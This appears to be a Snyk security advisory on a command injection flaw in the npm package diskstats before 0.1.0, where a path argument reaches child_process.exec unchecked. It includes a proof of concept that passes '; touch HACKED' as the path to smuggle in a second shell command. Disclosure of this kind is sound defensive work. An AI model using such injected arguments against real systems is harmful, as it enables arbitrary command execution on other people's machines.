Command Injection

Affecting diskstats package, versions <0.1.0

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

diskstats is a library that uses df to pull disk information such as free space & inode utilization on your system.

Affected versions of this package are vulnerable to Command Injection. The path parameter is used to build the command that is passed to the child_process.exec function without any check.

PoC by Alessio (d3lla)

  1. create a directory for testing

    mkdir poc
    cd poc/
  2. install diskstats module: npm i diskstats

  1. create the following PoC JavaScript file (poc.js):

    const diskstats = require('diskstats');
    diskstats.check('; touch HACKED', (err, results) => {});
  2. make sure that the HACKED file does not exist: ls

  3. execute the poc.js file: node poc.js

  4. the HACKED file is created: ls

    Remediation

    Upgrade diskstats to version 0.1.0 or higher.

    References

CVSS Score

9.8
high severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    High
  • Availability
    High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C
Credit
d3lla
CWE
CWE-78
Snyk ID
SNYK-JS-DISKSTATS-590099
Disclosed
23 Jul, 2020
Published
24 Jul, 2020